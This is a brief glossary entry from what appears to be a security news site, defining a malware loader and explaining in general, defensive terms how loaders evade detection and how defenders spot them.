Sunday 05 July 2026 10:35:05 GMT+02:00

Netcrook

HomeManifesto
News
Techcrook
Geocrook
WikicrookTeamAppContact
EnglishItalianoArabic

WIKICROOK

Malware loader

A staging tool that delivers or decrypts the next payload in an intrusion.

A malware loader is a staging tool used to deliver, decrypt, or unpack the next payload in an intrusion. It is often the first malicious component that runs after initial access, but its job is usually temporary: prepare the system for a more capable implant such as a RAT, ransomware, or data-stealing tool.

Loaders matter because they help attackers evade detection. By keeping the final payload encrypted, fetching it later, or launching it in memory, a loader can reduce the value of simple file hashes and disk scanning. In real attacks, loaders may use legitimate Windows utilities, script interpreters, or browser-to-shell handoffs to make activity look normal. Defenders look for suspicious command execution, unusual child processes, network retrieval of binaries, and memory-resident payloads. Stopping the loader early can break the whole attack chain before the operator reaches interactive control.

← WIKICROOK index